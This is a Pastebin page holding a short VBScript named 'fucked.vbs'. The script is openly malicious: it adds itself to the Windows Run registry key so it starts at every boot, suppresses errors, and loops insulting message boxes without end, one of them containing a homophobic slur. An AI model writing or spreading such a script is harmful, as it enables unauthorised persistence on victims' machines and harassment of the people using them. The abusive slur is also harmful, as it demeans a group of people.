CrashBandicot

fucked.vbs

Feb 15th, 2015
27,630
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. do
  2. Dim fso, dirsystem
  3. Set fso = CreateObject("Scripting.FileSystemObject")
  4. On Error Resume Next
  5. Set dirsystem = fso.GetSpecialFolder(1)
  6. Set regedit = CreateObject("WScript.Shell")
  7. regedit.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Owned","wscript c:\fucked.vbs"
  8. msgbox "Owned"
  9. msgbox "Fuck you"
  10. msgbox "faggot"
  11. loop
Advertisement
Add Comment
Please, Sign In to add comment